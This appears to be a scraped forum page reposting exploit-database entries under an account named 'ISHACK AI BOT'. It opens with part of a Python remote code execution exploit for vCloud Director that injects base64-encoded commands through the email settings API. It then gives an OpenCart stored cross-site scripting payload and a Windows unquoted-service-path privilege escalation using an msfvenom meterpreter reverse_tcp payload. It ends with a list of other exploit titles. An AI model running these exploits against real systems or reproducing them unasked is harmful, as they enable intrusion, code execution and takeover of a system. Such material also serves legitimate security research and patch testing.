\'([^\']+)', res.content) if match is None: print('[!] orgId not found') return (None,None,None,None) org_id = match.group(1) if verbose: print('[*] organization identifier: %s'%(org_id)) return (jwt,session_id,organization,org_id) def exploit(url, username, password, command, verbose): (jwt,session_id,organization,org_id) = login(url, username, password, verbose) if jwt is None: return headers = { 'Accept': 'application/*+xml;version=29.0', 'Authorization': 'Bearer %s'%jwt, 'x-vcloud-authorization': session_id } admin_url = '%s://%s/api/admin/'%(url.scheme, url.netloc) res = session.get(admin_url, headers=headers) match = re.search(r'<description>\s*([^<\s]+)', res.content, re.IGNORECASE) if match: version = match.group(1) if verbose: print('[*] detected version of Cloud Director: %s'%(version)) else: version = None print('[!] can\'t find version of Cloud Director, assuming it is more than 10.0') email_settings_url = '%s://%s/api/admin/org/%s/settings/email'%(url.scheme, url.netloc, org_id) payload = PAYLOAD_TEMPLATE.replace('COMMAND', base64.b64encode('(%s) 2>&1'%command)) data = '<root:OrgEmailSettings xmlns:root="http://www.vmware.com/vcloud/v1.5"><root:IsDefaultSmtpServer>false</root:IsDefaultSmtpServer>' data += '<root:IsDefaultOrgEmail>true</root:IsDefaultOrgEmail><root:FromEmailAddress/><root:DefaultSubjectPrefix/>' data += '<root:IsAlertEmailToAllAdmins>true</root:IsAlertEmailToAllAdmins><root:AlertEmailTo/><root:SmtpServerSettings>' data += '<root:IsUseAuthentication>false</root:IsUseAuthentication><root:Host>%s</root:Host><root:Port>25</root:Port>'%(payload) data += '<root:Username/><root:Password/></root:SmtpServerSettings></root:OrgEmailSettings>' res = session.put(email_settings_url, data=data, headers=headers) match = re.search(r'value:\s*\[([^\]]+)\]', res.content) if verbose: print('') try: print(base64.b64decode(match.group(1))) except Exception: print(res.content) parser = argparse.ArgumentParser(usage='%(prog)s -t target -u username -p password [-c command] [--check]') parser.add_argument('-v', action='store_true') parser.add_argument('-t', metavar='target', help='url to html5 client (http://example.com/tenant/my_company)', required=True) parser.add_argument('-u', metavar='username', required=True) parser.add_argument('-p', metavar='password', required=True) parser.add_argument('-c', metavar='command', help='command to execute', default='id') args = parser.parse_args() url = urlparse(args.t) exploit(url, args.u, args.p, args.c, args.v)

3月5日3月5日

# Exploit Title: OpenCart 3.0.3.2 - Stored Cross Site Scripting (Authenticated) # Date: 2020-06-01 # Exploit Author: Kailash Bohara # Vendor Homepage: https://www.opencart.com # Software Link: https://www.opencart.com/index.php?route=cms/download # Version: OpenCart < 3.0.3.2 # CVE : CVE-2020-10596 1. Go to localhost.com/opencart/admin and login with credentials. 2. Then navigate to System>Users>Users and click on Action button on top right corner. 3. Now in image field , click on image and upload a new image. Before this select any image file and rename with this XSS payload "><svg onload=alert("XSS")> and then upload it as new user profile image. 4. After the upload completes the XSS pop-up executes as shown below and it will gets executed each time someone visits the Image manager section.

3月5日3月5日

# Title: IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path # Author: Gobinathan L # Date: 2020-06-03 # Vendor Homepage: https://www.iobit.com # Software Link: https://www.iobit.com/en/advanceduninstaller.php # Version : 9.5.0.15 # Tested on: Windows 10 64bit(EN) About Unquoted Service Path : ============================== When a service is created whose executable path contains spaces and isn't enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges. (only if the vulnerable service is running with SYSTEM privilege level which most of the time it is). Steps to recreate : ============================= 1. Open CMD and Check for USP vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ] 2. The Vulnerable Service would Show up. 3. Check the Service Permissions by typing [ sc qc IObitUnSvr ] 4. The command would return.. C:\>sc qc IObitUnSvr [SC] QueryServiceConfig SUCCESS SERVICE_NAME: IObitUnSvr TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : IObit Uninstaller Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem 5. This concludes that the service is running as SYSTEM. "Highest privilege in a machine" 6. Now create a Payload with msfvenom or other tools and name it to IObit.exe 7. Make sure you have write Permissions to "C:\Program Files (x86)\IObit" directory. 8. Provided that you have right permissions, Drop the IObit.exe executable you created into the "C:\Program Files (x86)\IObit" Directory. 9. Now restart the IObit Uninstaller service by giving coommand [ sc stop IObitUnSvr ] followed by [ sc start IObitUnSvr ] 10. If your payload is created with msfvenom, quickly migrate to a different process. [Any process since you have the SYSTEM Privilege]. During my testing : Payload : msfvenom -p windows/meterpreter/reverse_tcp -f exe -o IObit.exe Migrate : meterpreter> run post/windows/manage/migrate [To migrate into a different Process ] # Disclaimer : ========================= The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

3月5日3月5日

登录

ISHACK AI BOT

注册日期

上次访问

ISHACK AI BOT 发布的所有帖子

StreamRipper32 2.6 - Buffer Overflow (PoC)

Pi-hole 4.4.0 - Remote Code Execution (Authenticated)

Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated)

WordPress Plugin Drag and Drop File Upload Contact Form 1.3.3.2 - Remote Code Execution

BIND - 'TSIG' Denial of Service

Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting

LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting

osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting

osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting

Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting

NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection

OXID eShop 6.3.4 - 'sorting' SQL Injection

Online-Exam-System 2015 - 'fid' SQL Injection

EyouCMS 1.4.6 - Persistent Cross-Site Scripting

WordPress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation

QNAP QTS and Photo Station 6.0.3 - Remote Command Execution

WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)

Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass

VMware vCenter Server 6.7 - Authentication Bypass

QuickBox Pro 2.1.8 - Authenticated Remote Code Execution

Clinic Management System 1.0 - Authentication Bypass

Microsoft Windows - 'SMBGhost' Remote Code Execution

vCloud Director 9.7.0.15498291 - Remote Code Execution

OpenCart 3.0.3.2 - Stored Cross Site Scripting (Authenticated)

IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path

帐户

导航

搜索